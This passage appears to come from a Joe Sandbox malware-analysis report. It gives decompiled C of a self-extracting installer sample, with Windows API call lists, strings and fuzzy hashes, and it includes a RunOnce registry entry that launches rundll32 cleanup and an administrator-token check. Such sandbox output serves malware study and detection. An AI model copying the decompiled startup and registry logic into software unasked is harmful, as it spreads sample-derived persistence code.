                                                                                                                                                                                                                                      								L15:
                                                                                                                                                                                                                                      								if(_t50 == 0) {
                                                                                                                                                                                                                                      									goto L16;
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return E00406C80(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                                                      			}























                                                                                                                                                                                                                                      0x00402770
                                                                                                                                                                                                                                      0x0040277b
                                                                                                                                                                                                                                      0x00402782
                                                                                                                                                                                                                                      0x00402787
                                                                                                                                                                                                                                      0x0040278a
                                                                                                                                                                                                                                      0x0040278d
                                                                                                                                                                                                                                      0x0040278f
                                                                                                                                                                                                                                      0x00402795
                                                                                                                                                                                                                                      0x0040279a
                                                                                                                                                                                                                                      0x004028af
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004027a0
                                                                                                                                                                                                                                      0x004027a0
                                                                                                                                                                                                                                      0x004027ac
                                                                                                                                                                                                                                      0x004027bf
                                                                                                                                                                                                                                      0x004027c5
                                                                                                                                                                                                                                      0x004027ca
                                                                                                                                                                                                                                      0x004027d2
                                                                                                                                                                                                                                      0x004028b4
                                                                                                                                                                                                                                      0x004028b6
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004027d8
                                                                                                                                                                                                                                      0x004027da
                                                                                                                                                                                                                                      0x004028a7
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004027e0
                                                                                                                                                                                                                                      0x004027e0
                                                                                                                                                                                                                                      0x004027e9
                                                                                                                                                                                                                                      0x004027f5
                                                                                                                                                                                                                                      0x00402800
                                                                                                                                                                                                                                      0x00402808
                                                                                                                                                                                                                                      0x0040282e
                                                                                                                                                                                                                                      0x004028c0
                                                                                                                                                                                                                                      0x004028c6
                                                                                                                                                                                                                                      0x004028ca
                                                                                                                                                                                                                                      0x00402834
                                                                                                                                                                                                                                      0x00402857
                                                                                                                                                                                                                                      0x00402859
                                                                                                                                                                                                                                      0x00402862
                                                                                                                                                                                                                                      0x0040288f
                                                                                                                                                                                                                                      0x00402892
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00402864
                                                                                                                                                                                                                                      0x00402875
                                                                                                                                                                                                                                      0x00402889
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00402877
                                                                                                                                                                                                                                      0x0040287d
                                                                                                                                                                                                                                      0x00402882
                                                                                                                                                                                                                                      0x00402894
                                                                                                                                                                                                                                      0x00402896
                                                                                                                                                                                                                                      0x00402896
                                                                                                                                                                                                                                      0x00402875
                                                                                                                                                                                                                                      0x00402862
                                                                                                                                                                                                                                      0x0040289d
                                                                                                                                                                                                                                      0x004028bc
                                                                                                                                                                                                                                      0x004028be
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004028be
                                                                                                                                                                                                                                      0x0040282e
                                                                                                                                                                                                                                      0x004027da
                                                                                                                                                                                                                                      0x004027d2
                                                                                                                                                                                                                                      0x004028e0

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharUpperA.USER32(F5E26B31,00000000,00000000,00000000), ref: 004027A5
                                                                                                                                                                                                                                      • CharNextA.USER32(0000054D), ref: 004027B2
                                                                                                                                                                                                                                      • CharNextA.USER32(00000000), ref: 004027B9
                                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402826
                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,00401140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 0040284F
                                                                                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 0040286D
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 0040289D
                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 004028A7
                                                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(-00000005,00000104), ref: 004028B6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 004027E1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                      • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                      • Opcode ID: 472a8cbb82c21630a0d68b64369d5e21df6ef6d9f2b44e87e53f41a16ee43ce2
                                                                                                                                                                                                                                      • Instruction ID: e4760dee49a9a743f21e1b951a449edcff4f0dd55948a349b42ba1098dc93767
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 472a8cbb82c21630a0d68b64369d5e21df6ef6d9f2b44e87e53f41a16ee43ce2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E941E57590012CAFDB249F249D89AEA77BDEF55700F0040BAF645F2190DBB88E858F69
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 62%
                                                                                                                                                                                                                                      			E0040226E() {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                                                      				char _v836;
                                                                                                                                                                                                                                      				void* _v840;
                                                                                                                                                                                                                                      				int _v844;
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                                                      				intOrPtr _t33;
                                                                                                                                                                                                                                      				void* _t38;
                                                                                                                                                                                                                                      				intOrPtr* _t42;
                                                                                                                                                                                                                                      				void* _t45;
                                                                                                                                                                                                                                      				void* _t47;
                                                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                                                      				signed int _t51;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t19 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                      				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                      				if( *0x408530 != 0) {
                                                                                                                                                                                                                                      					_push(_t49);
                                                                                                                                                                                                                                      					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                      						_push(_t38);
                                                                                                                                                                                                                                      						_v844 = 0x238;
                                                                                                                                                                                                                                      						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                      							_push(_t47);
                                                                                                                                                                                                                                      							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                      							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                      								E00406534( &_v268, 0x104, 0x401140);
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							_push("C:\Users\Arthur\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                      							E0040173E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                      							_t42 =  &_v836;
                                                                                                                                                                                                                                      							_t45 = _t42 + 1;
                                                                                                                                                                                                                                      							_pop(_t47);
                                                                                                                                                                                                                                      							do {
                                                                                                                                                                                                                                      								_t33 =  *_t42;
                                                                                                                                                                                                                                      								_t42 = _t42 + 1;
                                                                                                                                                                                                                                      							} while (_t33 != 0);
                                                                                                                                                                                                                                      							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                      						_pop(_t38);
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					_pop(_t49);
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return E00406C80(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                      			}



















                                                                                                                                                                                                                                      0x00402279
                                                                                                                                                                                                                                      0x0040227e
                                                                                                                                                                                                                                      0x00402280
                                                                                                                                                                                                                                      0x0040228a
                                                                                                                                                                                                                                      0x00402290
                                                                                                                                                                                                                                      0x004022b2
                                                                                                                                                                                                                                      0x004022b8
                                                                                                                                                                                                                                      0x004022cb
                                                                                                                                                                                                                                      0x004022e7
                                                                                                                                                                                                                                      0x004022ed
                                                                                                                                                                                                                                      0x004022fc
                                                                                                                                                                                                                                      0x00402314
                                                                                                                                                                                                                                      0x00402323
                                                                                                                                                                                                                                      0x00402323
                                                                                                                                                                                                                                      0x00402328
                                                                                                                                                                                                                                      0x00402341
                                                                                                                                                                                                                                      0x00402349
                                                                                                                                                                                                                                      0x0040234f
                                                                                                                                                                                                                                      0x00402352
                                                                                                                                                                                                                                      0x00402353
                                                                                                                                                                                                                                      0x00402353
                                                                                                                                                                                                                                      0x00402355
                                                                                                                                                                                                                                      0x00402356
                                                                                                                                                                                                                                      0x00402375
                                                                                                                                                                                                                                      0x00402375
                                                                                                                                                                                                                                      0x00402381
                                                                                                                                                                                                                                      0x00402387
                                                                                                                                                                                                                                      0x00402387
                                                                                                                                                                                                                                      0x00402388
                                                                                                                                                                                                                                      0x00402388
                                                                                                                                                                                                                                      0x00402394

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 004022AA
                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 004022DF
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004022FC
                                                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040230C
                                                                                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00402375
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402381
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 004022A0
                                                                                                                                                                                                                                      • wextract_cleanup0, xrefs: 00402283, 004022D4, 0040236A
                                                                                                                                                                                                                                      • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00402334
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00402328
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                                                                      • API String ID: 3027380567-1146919470
                                                                                                                                                                                                                                      • Opcode ID: 85e8951011cf66502f00aa4bfa0fb42d1cc7343e356643ce89222a7cb38255e4
                                                                                                                                                                                                                                      • Instruction ID: 3c9b39ee3b7690f49423c3be69d34257d97f53bdef0933872901e7f1e312b19f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85e8951011cf66502f00aa4bfa0fb42d1cc7343e356643ce89222a7cb38255e4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C319571A002186BDB219F21DD49FDB7B7CEF54744F0400BAB94DB61D1DA78AB88CA54
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                                                                                                      			E004030F0(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                                                                      				struct HWND__* _t16;
                                                                                                                                                                                                                                      				struct HWND__* _t33;
                                                                                                                                                                                                                                      				struct HWND__* _t34;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t8 = _a8 - 0xf;
                                                                                                                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                                                                                                                      					if( *0x408590 == 0) {
                                                                                                                                                                                                                                      						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                      						 *0x408590 = 1;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					L13:
                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t11 = _t8 - 1;
                                                                                                                                                                                                                                      				if(_t11 == 0) {
                                                                                                                                                                                                                                      					L7:
                                                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                                                      					L8:
                                                                                                                                                                                                                                      					EndDialog(_a4, ??);
                                                                                                                                                                                                                                      					L9:
                                                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                      				if(_t15 == 0) {
                                                                                                                                                                                                                                      					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                      					_t33 = _a4;
                                                                                                                                                                                                                                      					E004043AE(_t33, _t16);
                                                                                                                                                                                                                                      					SetDlgItemTextA(_t33, 0x834,  *0x408d4c);
                                                                                                                                                                                                                                      					SetWindowTextA(_t33, "OxZQ");
                                                                                                                                                                                                                                      					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                      					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                      					 *0x4088b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                      					SetWindowLongA(_t34, 0xfffffffc, E004030B0);
                                                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				if(_t15 != 1) {
                                                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				if(_a12 != 6) {
                                                                                                                                                                                                                                      					if(_a12 != 7) {
                                                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					goto L7;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                                                                      				goto L8;
                                                                                                                                                                                                                                      			}









                                                                                                                                                                                                                                      0x004030f8
                                                                                                                                                                                                                                      0x004030fb
                                                                                                                                                                                                                                      0x004031a7
                                                                                                                                                                                                                                      0x004031ba
                                                                                                                                                                                                                                      0x004031c0
                                                                                                                                                                                                                                      0x004031c0
                                                                                                                                                                                                                                      0x004031ca
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004031ca
                                                                                                                                                                                                                                      0x00403101
                                                                                                                                                                                                                                      0x00403104
                                                                                                                                                                                                                                      0x00403126
                                                                                                                                                                                                                                      0x00403126
                                                                                                                                                                                                                                      0x00403128
                                                                                                                                                                                                                                      0x0040312b
                                                                                                                                                                                                                                      0x00403131
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403133
                                                                                                                                                                                                                                      0x00403106
                                                                                                                                                                                                                                      0x0040310b
                                                                                                                                                                                                                                      0x0040313b
                                                                                                                                                                                                                                      0x00403141
                                                                                                                                                                                                                                      0x00403148
                                                                                                                                                                                                                                      0x0040315a
                                                                                                                                                                                                                                      0x00403166
                                                                                                                                                                                                                                      0x0040316d
                                                                                                                                                                                                                                      0x0040317b
                                                                                                                                                                                                                                      0x0040318e
                                                                                                                                                                                                                                      0x00403193
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040319d
                                                                                                                                                                                                                                      0x00403110
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040311a
                                                                                                                                                                                                                                      0x00403124
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403124
                                                                                                                                                                                                                                      0x0040311c
                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 0040312B
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0040313B
                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,00000834), ref: 0040315A
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,OxZQ), ref: 00403166
                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0040316D
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000834), ref: 00403175
                                                                                                                                                                                                                                      • GetWindowLongA.USER32(00000000,000000FC), ref: 00403180
                                                                                                                                                                                                                                      • SetWindowLongA.USER32(00000000,000000FC,004030B0), ref: 00403193
                                                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 004031BA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                      • String ID: OxZQ
                                                                                                                                                                                                                                      • API String ID: 3785188418-3840506403
                                                                                                                                                                                                                                      • Opcode ID: d42c5b457f36d2e021e3bf78cc34a404ada3106ff110fec489d28a0048ae4cba
                                                                                                                                                                                                                                      • Instruction ID: 93a2912f688cadcf35c45e86d2cb54c41c4b14bad890ed68d20d7d03ded533e5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d42c5b457f36d2e021e3bf78cc34a404ada3106ff110fec489d28a0048ae4cba
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF11B131154311BBDB116F24DE0CB5B3E68FB4E722F104236F855B92E0CBB88A61C68E
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                                                                                                      			E004018C1(void* __edx, void* __esi) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				short _v12;
                                                                                                                                                                                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                                                      				long _v24;
                                                                                                                                                                                                                                      				void* _v28;
                                                                                                                                                                                                                                      				void* _v32;
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                                                      				long _t45;
                                                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                                                      				void* _t52;
                                                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t51 = __esi;
                                                                                                                                                                                                                                      				_t49 = __edx;
                                                                                                                                                                                                                                      				_t23 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                                                      				_t25 =  *0x408128; // 0x2
                                                                                                                                                                                                                                      				_t45 = 0;
                                                                                                                                                                                                                                      				_v12 = 0x500;
                                                                                                                                                                                                                                      				_t50 = 2;
                                                                                                                                                                                                                                      				_v16.Value = 0;
                                                                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                                                                      				if(_t25 != _t50) {
                                                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                                                      					return E00406C80(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				if(E0040180E( &_v20) != 0) {
                                                                                                                                                                                                                                      					_t25 = _v20;
                                                                                                                                                                                                                                      					if(_v20 != 0) {
                                                                                                                                                                                                                                      						 *0x408128 = 1;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                      					L17:
                                                                                                                                                                                                                                      					CloseHandle(_v28);
                                                                                                                                                                                                                                      					_t25 = _v20;
                                                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					_push(__esi);
                                                                                                                                                                                                                                      					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                      					if(_t52 == 0) {
                                                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                                                      						_pop(_t51);
                                                                                                                                                                                                                                      						goto L17;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                                                      						L15:
                                                                                                                                                                                                                                      						LocalFree(_t52);
                                                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						if( *_t52 <= 0) {
                                                                                                                                                                                                                                      							L14:
                                                                                                                                                                                                                                      							FreeSid(_v32);
                                                                                                                                                                                                                                      							goto L15;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                      						_t50 = _t15;
                                                                                                                                                                                                                                      						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                      							_t45 = _t45 + 1;
                                                                                                                                                                                                                                      							_t50 = _t50 + 8;
                                                                                                                                                                                                                                      							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						 *0x408128 = 1;
                                                                                                                                                                                                                                      						_v20 = 1;
                                                                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      			}


















                                                                                                                                                                                                                                      0x004018c1
                                                                                                                                                                                                                                      0x004018c1
                                                                                                                                                                                                                                      0x004018c9
                                                                                                                                                                                                                                      0x004018d0
                                                                                                                                                                                                                                      0x004018d3
                                                                                                                                                                                                                                      0x004018dc
                                                                                                                                                                                                                                      0x004018de
                                                                                                                                                                                                                                      0x004018e4
                                                                                                                                                                                                                                      0x004018e5
                                                                                                                                                                                                                                      0x004018e8
                                                                                                                                                                                                                                      0x004018ed
                                                                                                                                                                                                                                      0x004019e7
                                                                                                                                                                                                                                      0x004019f4
                                                                                                                                                                                                                                      0x004019f4
                                                                                                                                                                                                                                      0x004018fd
                                                                                                                                                                                                                                      0x004019d6
                                                                                                                                                                                                                                      0x004019db
                                                                                                                                                                                                                                      0x004019dd
                                                                                                                                                                                                                                      0x004019dd
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004019db
                                                                                                                                                                                                                                      0x00401918
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00401930
                                                                                                                                                                                                                                      0x004019c8
                                                                                                                                                                                                                                      0x004019cb
                                                                                                                                                                                                                                      0x004019d1
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00401945
                                                                                                                                                                                                                                      0x00401945
                                                                                                                                                                                                                                      0x00401950
                                                                                                                                                                                                                                      0x00401954
                                                                                                                                                                                                                                      0x004019c7
                                                                                                                                                                                                                                      0x004019c7
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004019c7
                                                                                                                                                                                                                                      0x0040196a
                                                                                                                                                                                                                                      0x004019c0
                                                                                                                                                                                                                                      0x004019c1
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040198c
                                                                                                                                                                                                                                      0x0040198e
                                                                                                                                                                                                                                      0x004019b7
                                                                                                                                                                                                                                      0x004019ba
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004019ba
                                                                                                                                                                                                                                      0x00401990
                                                                                                                                                                                                                                      0x00401990
                                                                                                                                                                                                                                      0x00401993
                                                                                                                                                                                                                                      0x004019a2
                                                                                                                                                                                                                                      0x004019a3
                                                                                                                                                                                                                                      0x004019a8
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004019aa
                                                                                                                                                                                                                                      0x004019af
                                                                                                                                                                                                                                      0x004019b4
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004019b4
                                                                                                                                                                                                                                      0x0040196a

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040180E: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,004018FB), ref: 0040183A
                                                                                                                                                                                                                                        • Part of subcall function 0040180E: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0040184C
                                                                                                                                                                                                                                        • Part of subcall function 0040180E: AllocateAndInitializeSid.ADVAPI32(004018FB,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,004018FB), ref: 00401875
                                                                                                                                                                                                                                        • Part of subcall function 0040180E: FreeSid.ADVAPI32(?,?,?,?,004018FB), ref: 004018A3
                                                                                                                                                                                                                                        • Part of subcall function 0040180E: FreeLibrary.KERNEL32(00000000,?,?,?,004018FB), ref: 004018AA
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00401909
                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00401910
                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00401928
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00401936
                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000000,?,?), ref: 0040194A
